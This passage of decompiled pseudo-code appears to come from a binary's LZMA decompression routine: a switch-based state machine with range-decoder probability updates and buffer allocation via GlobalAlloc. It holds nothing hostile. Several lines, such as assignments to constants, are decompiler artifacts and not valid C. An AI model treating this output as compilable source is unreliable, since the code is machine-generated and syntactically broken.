                  							_t547 =  *(_t613 - 0x40);
                  							if(_t547 ==  *(_t613 - 0x74)) {
                  								L20:
                  								 *(_t613 - 0x48) = 5;
                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                  								goto L23;
                  							}
                  							 *(_t613 - 0x74) = _t547;
                  							if( *(_t613 - 8) != 0) {
                  								GlobalFree( *(_t613 - 8));
                  							}
                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                  							 *(_t613 - 8) = _t535;
                  							if(_t535 == 0) {
                  								goto L171;
                  							} else {
                  								goto L20;
                  							}
                  						case 2:
                  							L24:
                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                  							 *(_t613 - 0x84) = 6;
                  							 *(_t613 - 0x4c) = _t554;
                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                  							goto L132;
                  						case 3:
                  							L21:
                  							__eflags =  *(_t613 - 0x6c);
                  							if( *(_t613 - 0x6c) == 0) {
                  								 *(_t613 - 0x88) = 3;
                  								goto L170;
                  							}
                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  							_t67 = _t613 - 0x70;
                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                  							__eflags =  *_t67;
                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                  							L23:
                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                  							if( *(_t613 - 0x48) != 0) {
                  								goto L21;
                  							}
                  							goto L24;
                  						case 4:
                  							goto L133;
                  						case 5:
                  							goto L137;
                  						case 6:
                  							__edx = 0;
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 4);
                  								__ecx =  *(__ebp - 0x38);
                  								 *(__ebp - 0x34) = 1;
                  								 *(__ebp - 0x84) = 7;
                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                  								goto L132;
                  							}
                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  							__esi =  *(__ebp - 0x60);
                  							__cl = 8;
                  							__cl = 8 -  *(__ebp - 0x3c);
                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  							__ecx =  *(__ebp - 0x3c);
                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  							__ecx =  *(__ebp - 4);
                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  							__eflags =  *(__ebp - 0x38) - 4;
                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  							if( *(__ebp - 0x38) >= 4) {
                  								__eflags =  *(__ebp - 0x38) - 0xa;
                  								if( *(__ebp - 0x38) >= 0xa) {
                  									_t98 = __ebp - 0x38;
                  									 *_t98 =  *(__ebp - 0x38) - 6;
                  									__eflags =  *_t98;
                  								} else {
                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  								}
                  							} else {
                  								 *(__ebp - 0x38) = 0;
                  							}
                  							__eflags =  *(__ebp - 0x34) - __edx;
                  							if( *(__ebp - 0x34) == __edx) {
                  								__ebx = 0;
                  								__ebx = 1;
                  								goto L61;
                  							} else {
                  								__eax =  *(__ebp - 0x14);
                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  								__eflags = __eax -  *(__ebp - 0x74);
                  								if(__eax >=  *(__ebp - 0x74)) {
                  									__eax = __eax +  *(__ebp - 0x74);
                  									__eflags = __eax;
                  								}
                  								__ecx =  *(__ebp - 8);
                  								__ebx = 0;
                  								__ebx = 1;
                  								__al =  *((intOrPtr*)(__eax + __ecx));
                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  								goto L41;
                  							}
                  						case 7:
                  							__eflags =  *(__ebp - 0x40) - 1;
                  							if( *(__ebp - 0x40) != 1) {
                  								__eax =  *(__ebp - 0x24);
                  								 *(__ebp - 0x80) = 0x16;
                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  								__eax =  *(__ebp - 0x28);
                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  								__eax =  *(__ebp - 0x2c);
                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  								__eax = 0;
                  								__eflags =  *(__ebp - 0x38) - 7;
                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  								__al = __al & 0x000000fd;
                  								__eax = (__eflags >= 0) - 1 + 0xa;
                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                  								__eax =  *(__ebp - 4);
                  								__eax =  *(__ebp - 4) + 0x664;
                  								__eflags = __eax;
                  								 *(__ebp - 0x58) = __eax;
                  								goto L69;
                  							}
                  							__eax =  *(__ebp - 4);
                  							__ecx =  *(__ebp - 0x38);
                  							 *(__ebp - 0x84) = 8;
                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                  							goto L132;
                  						case 8:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 4);
                  								__ecx =  *(__ebp - 0x38);
                  								 *(__ebp - 0x84) = 0xa;
                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                  							} else {
                  								__eax =  *(__ebp - 0x38);
                  								__ecx =  *(__ebp - 4);
                  								__eax =  *(__ebp - 0x38) + 0xf;
                  								 *(__ebp - 0x84) = 9;
                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                  							}
                  							goto L132;
                  						case 9:
                  							goto L0;
                  						case 0xa:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 4);
                  								__ecx =  *(__ebp - 0x38);
                  								 *(__ebp - 0x84) = 0xb;
                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                  								goto L132;
                  							}
                  							__eax =  *(__ebp - 0x28);
                  							goto L88;
                  						case 0xb:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__ecx =  *(__ebp - 0x24);
                  								__eax =  *(__ebp - 0x20);
                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  							} else {
                  								__eax =  *(__ebp - 0x24);
                  							}
                  							__ecx =  *(__ebp - 0x28);
                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  							L88:
                  							__ecx =  *(__ebp - 0x2c);
                  							 *(__ebp - 0x2c) = __eax;
                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  							goto L89;
                  						case 0xc:
                  							L99:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0xc;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t334 = __ebp - 0x70;
                  							 *_t334 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t334;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							__eax =  *(__ebp - 0x2c);
                  							goto L101;
                  						case 0xd:
                  							L37:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0xd;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t122 = __ebp - 0x70;
                  							 *_t122 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t122;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							L39:
                  							__eax =  *(__ebp - 0x40);
                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  								goto L48;
                  							}
                  							__eflags = __ebx - 0x100;
                  							if(__ebx >= 0x100) {
                  								goto L54;
                  							}
                  							L41:
                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  							__ecx =  *(__ebp - 0x58);
                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  							 *(__ebp - 0x48) = __eax;
                  							__eax = __eax + 1;
                  							__eax = __eax << 8;
                  							__eax = __eax + __ebx;
                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  							__ax =  *__esi;
                  							 *(__ebp - 0x54) = __esi;
                  							__edx = __ax & 0x0000ffff;
                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  							__eflags =  *(__ebp - 0xc) - __ecx;
                  							if( *(__ebp - 0xc) >= __ecx) {
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  								__cx = __ax;
                  								 *(__ebp - 0x40) = 1;
                  								__cx = __ax >> 5;
                  								__eflags = __eax;
                  								__ebx = __ebx + __ebx + 1;
                  								 *__esi = __ax;
                  							} else {
                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  								 *(__ebp - 0x10) = __ecx;
                  								0x800 = 0x800 - __edx;
                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  								__ebx = __ebx + __ebx;
                  								 *__esi = __cx;
                  							}
                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                  							 *(__ebp - 0x44) = __ebx;
                  							if( *(__ebp - 0x10) >= 0x1000000) {
                  								goto L39;
                  							} else {
                  								goto L37;
                  							}
                  						case 0xe:
                  							L46:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0xe;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t156 = __ebp - 0x70;
                  							 *_t156 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t156;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							while(1) {
                  								L48:
                  								__eflags = __ebx - 0x100;
                  								if(__ebx >= 0x100) {
                  									break;
                  								}
                  								__eax =  *(__ebp - 0x58);
                  								__edx = __ebx + __ebx;
                  								__ecx =  *(__ebp - 0x10);
                  								__esi = __edx + __eax;
                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                  								__ax =  *__esi;
                  								 *(__ebp - 0x54) = __esi;
                  								__edi = __ax & 0x0000ffff;
                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  								__eflags =  *(__ebp - 0xc) - __ecx;
                  								if( *(__ebp - 0xc) >= __ecx) {
                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  									__cx = __ax;
                  									_t170 = __edx + 1; // 0x1
                  									__ebx = _t170;
                  									__cx = __ax >> 5;
                  									__eflags = __eax;
                  									 *__esi = __ax;
                  								} else {
                  									 *(__ebp - 0x10) = __ecx;
                  									0x800 = 0x800 - __edi;
                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  									__ebx = __ebx + __ebx;
                  									 *__esi = __cx;
                  								}
                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                  								 *(__ebp - 0x44) = __ebx;
                  								if( *(__ebp - 0x10) >= 0x1000000) {
                  									continue;
                  								} else {
                  									goto L46;
                  								}
                  							}
                  							L54:
                  							_t173 = __ebp - 0x34;
                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                  							__eflags =  *_t173;
                  							goto L55;
                  						case 0xf:
                  							L58:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0xf;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t203 = __ebp - 0x70;
                  							 *_t203 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t203;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							L60:
                  							__eflags = __ebx - 0x100;
                  							if(__ebx >= 0x100) {
                  								L55:
                  								__al =  *(__ebp - 0x44);
                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  								goto L56;
                  							}
                  							L61:
                  							__eax =  *(__ebp - 0x58);
                  							__edx = __ebx + __ebx;
                  							__ecx =  *(__ebp - 0x10);
                  							__esi = __edx + __eax;
                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                  							__ax =  *__esi;
                  							 *(__ebp - 0x54) = __esi;
                  							__edi = __ax & 0x0000ffff;
                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  							__eflags =  *(__ebp - 0xc) - __ecx;
                  							if( *(__ebp - 0xc) >= __ecx) {
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  								__cx = __ax;
                  								_t217 = __edx + 1; // 0x1
                  								__ebx = _t217;
                  								__cx = __ax >> 5;
                  								__eflags = __eax;
                  								 *__esi = __ax;
                  							} else {
                  								 *(__ebp - 0x10) = __ecx;
                  								0x800 = 0x800 - __edi;
                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  								__ebx = __ebx + __ebx;
                  								 *__esi = __cx;
                  							}
                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                  							 *(__ebp - 0x44) = __ebx;
                  							if( *(__ebp - 0x10) >= 0x1000000) {
                  								goto L60;
                  							} else {
                  								goto L58;
                  							}
                  						case 0x10:
                  							L109:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0x10;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t365 = __ebp - 0x70;
                  							 *_t365 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t365;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							goto L111;
                  						case 0x11:
                  							goto L69;
                  						case 0x12:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 0x58);
                  								 *(__ebp - 0x84) = 0x13;
                  								__esi =  *(__ebp - 0x58) + 2;
                  								goto L132;
                  							}
                  							__eax =  *(__ebp - 0x4c);
                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  							__ecx =  *(__ebp - 0x58);
                  							__eax =  *(__ebp - 0x4c) << 4;
                  							__eflags = __eax;
                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                  							goto L130;
                  						case 0x13:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								_t469 = __ebp - 0x58;
                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                  								__eflags =  *_t469;
                  								 *(__ebp - 0x30) = 0x10;
                  								 *(__ebp - 0x40) = 8;
                  								L144:
                  								 *(__ebp - 0x7c) = 0x14;
                  								goto L145;
                  							}
                  							__eax =  *(__ebp - 0x4c);
                  							__ecx =  *(__ebp - 0x58);
                  							__eax =  *(__ebp - 0x4c) << 4;
                  							 *(__ebp - 0x30) = 8;
                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  							L130:
                  							 *(__ebp - 0x58) = __eax;
                  							 *(__ebp - 0x40) = 3;
                  							goto L144;
                  						case 0x14:
                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  							__eax =  *(__ebp - 0x80);
                  							goto L140;
                  						case 0x15:
                  							__eax = 0;
                  							__eflags =  *(__ebp - 0x38) - 7;
                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  							__al = __al & 0x000000fd;
                  							__eax = (__eflags >= 0) - 1 + 0xb;
                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  							goto L120;
                  						case 0x16:
                  							__eax =  *(__ebp - 0x30);
                  							__eflags = __eax - 4;
                  							if(__eax >= 4) {
                  								_push(3);
                  								_pop(__eax);
                  							}
                  							__ecx =  *(__ebp - 4);
                  							 *(__ebp - 0x40) = 6;
                  							__eax = __eax << 7;
                  							 *(__ebp - 0x7c) = 0x19;
                  							 *(__ebp - 0x58) = __eax;
                  							goto L145;
                  						case 0x17:
                  							L145:
                  							__eax =  *(__ebp - 0x40);
                  							 *(__ebp - 0x50) = 1;
                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                  							goto L149;
                  						case 0x18:
                  							L146:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0x18;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t484 = __ebp - 0x70;
                  							 *_t484 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t484;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							L148:
                  							_t487 = __ebp - 0x48;
                  							 *_t487 =  *(__ebp - 0x48) - 1;
                  							__eflags =  *_t487;
                  							L149:
                  							__eflags =  *(__ebp - 0x48);
                  							if( *(__ebp - 0x48) <= 0) {
                  								__ecx =  *(__ebp - 0x40);
                  								__ebx =  *(__ebp - 0x50);
                  								0 = 1;
                  								__eax = 1 << __cl;
                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                  								__eax =  *(__ebp - 0x7c);
                  								 *(__ebp - 0x44) = __ebx;
                  								goto L140;
                  							}
                  							__eax =  *(__ebp - 0x50);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  							__eax =  *(__ebp - 0x58);
                  							__esi = __edx + __eax;
                  							 *(__ebp - 0x54) = __esi;
                  							__ax =  *__esi;
                  							__edi = __ax & 0x0000ffff;
                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  							__eflags =  *(__ebp - 0xc) - __ecx;
                  							if( *(__ebp - 0xc) >= __ecx) {
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  								__cx = __ax;
                  								__cx = __ax >> 5;
                  								__eax = __eax - __ecx;
                  								__edx = __edx + 1;
                  								__eflags = __edx;
                  								 *__esi = __ax;
                  								 *(__ebp - 0x50) = __edx;
                  							} else {
                  								 *(__ebp - 0x10) = __ecx;
                  								0x800 = 0x800 - __edi;
                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  								 *__esi = __cx;
                  							}
                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                  							if( *(__ebp - 0x10) >= 0x1000000) {
                  								goto L148;
                  							} else {
                  								goto L146;
                  							}
                  						case 0x19:
                  							__eflags = __ebx - 4;
                  							if(__ebx < 4) {
                  								 *(__ebp - 0x2c) = __ebx;
                  								L119:
                  								_t393 = __ebp - 0x2c;
                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                  								__eflags =  *_t393;
                  								L120:
                  								__eax =  *(__ebp - 0x2c);
                  								__eflags = __eax;
                  								if(__eax == 0) {
                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  									goto L170;
                  								}
                  								__eflags = __eax -  *(__ebp - 0x60);
                  								if(__eax >  *(__ebp - 0x60)) {
                  									goto L171;
                  								}
                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  								__eax =  *(__ebp - 0x30);
                  								_t400 = __ebp - 0x60;
                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  								__eflags =  *_t400;
                  								goto L123;
                  							}
                  							__ecx = __ebx;
                  							__eax = __ebx;
                  							__ecx = __ebx >> 1;
                  							__eax = __ebx & 0x00000001;
                  							__ecx = (__ebx >> 1) - 1;
                  							__al = __al | 0x00000002;
                  							__eax = (__ebx & 0x00000001) << __cl;
                  							__eflags = __ebx - 0xe;
                  							 *(__ebp - 0x2c) = __eax;
                  							if(__ebx >= 0xe) {
                  								__ebx = 0;
                  								 *(__ebp - 0x48) = __ecx;
                  								L102:
                  								__eflags =  *(__ebp - 0x48);
                  								if( *(__ebp - 0x48) <= 0) {
                  									__eax = __eax + __ebx;
                  									 *(__ebp - 0x40) = 4;
                  									 *(__ebp - 0x2c) = __eax;
                  									__eax =  *(__ebp - 4);
                  									__eax =  *(__ebp - 4) + 0x644;
                  									__eflags = __eax;
                  									L108:
                  									__ebx = 0;
                  									 *(__ebp - 0x58) = __eax;
                  									 *(__ebp - 0x50) = 1;
                  									 *(__ebp - 0x44) = 0;
                  									 *(__ebp - 0x48) = 0;
                  									L112:
                  									__eax =  *(__ebp - 0x40);
                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  										_t391 = __ebp - 0x2c;
                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                  										__eflags =  *_t391;
                  										goto L119;
                  									}
                  									__eax =  *(__ebp - 0x50);
                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  									__eax =  *(__ebp - 0x58);
                  									__esi = __edi + __eax;
                  									 *(__ebp - 0x54) = __esi;
                  									__ax =  *__esi;
                  									__ecx = __ax & 0x0000ffff;
                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  									__eflags =  *(__ebp - 0xc) - __edx;
                  									if( *(__ebp - 0xc) >= __edx) {
                  										__ecx = 0;
                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  										__ecx = 1;
                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  										__ebx = 1;
                  										__ecx =  *(__ebp - 0x48);
                  										__ebx = 1 << __cl;
                  										__ecx = 1 << __cl;
                  										__ebx =  *(__ebp - 0x44);
                  										__ebx =  *(__ebp - 0x44) | __ecx;
                  										__cx = __ax;
                  										__cx = __ax >> 5;
                  										__eax = __eax - __ecx;
                  										__edi = __edi + 1;
                  										__eflags = __edi;
                  										 *(__ebp - 0x44) = __ebx;
                  										 *__esi = __ax;
                  										 *(__ebp - 0x50) = __edi;
                  									} else {
                  										 *(__ebp - 0x10) = __edx;
                  										0x800 = 0x800 - __ecx;
                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  										 *__esi = __dx;
                  									}
                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                  									if( *(__ebp - 0x10) >= 0x1000000) {
                  										L111:
                  										_t368 = __ebp - 0x48;
                  										 *_t368 =  *(__ebp - 0x48) + 1;
                  										__eflags =  *_t368;
                  										goto L112;
                  									} else {
                  										goto L109;
                  									}
                  								}
                  								__ecx =  *(__ebp - 0xc);
                  								__ebx = __ebx + __ebx;
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  								 *(__ebp - 0x44) = __ebx;
                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  									__ecx =  *(__ebp - 0x10);
                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  									__ebx = __ebx | 0x00000001;
                  									__eflags = __ebx;
                  									 *(__ebp - 0x44) = __ebx;
                  								}
                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                  								if( *(__ebp - 0x10) >= 0x1000000) {
                  									L101:
                  									_t338 = __ebp - 0x48;
                  									 *_t338 =  *(__ebp - 0x48) - 1;
                  									__eflags =  *_t338;
                  									goto L102;
                  								} else {
                  									goto L99;
                  								}
                  							}
                  							__edx =  *(__ebp - 4);
                  							__eax = __eax - __ebx;
                  							 *(__ebp - 0x40) = __ecx;
                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  							goto L108;
                  						case 0x1a:
                  							L56:
                  							__eflags =  *(__ebp - 0x64);
                  							if( *(__ebp - 0x64) == 0) {
                  								 *(__ebp - 0x88) = 0x1a;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x68);
                  							__al =  *(__ebp - 0x5c);
                  							__edx =  *(__ebp - 8);
                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  							 *( *(__ebp - 0x68)) = __al;
                  							__ecx =  *(__ebp - 0x14);
                  							 *(__ecx +  *(__ebp - 8)) = __al;
                  							__eax = __ecx + 1;
                  							__edx = 0;
                  							_t192 = __eax %  *(__ebp - 0x74);
                  							__eax = __eax /  *(__ebp - 0x74);
                  							__edx = _t192;
                  							goto L79;
                  						case 0x1b:
                  							goto L75;
                  						case 0x1c:
                  							while(1) {
                  								L123:
                  								__eflags =  *(__ebp - 0x64);
                  								if( *(__ebp - 0x64) == 0) {
                  									break;
                  								}
                  								__eax =  *(__ebp - 0x14);
                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  								__eflags = __eax -  *(__ebp - 0x74);
                  								if(__eax >=  *(__ebp - 0x74)) {
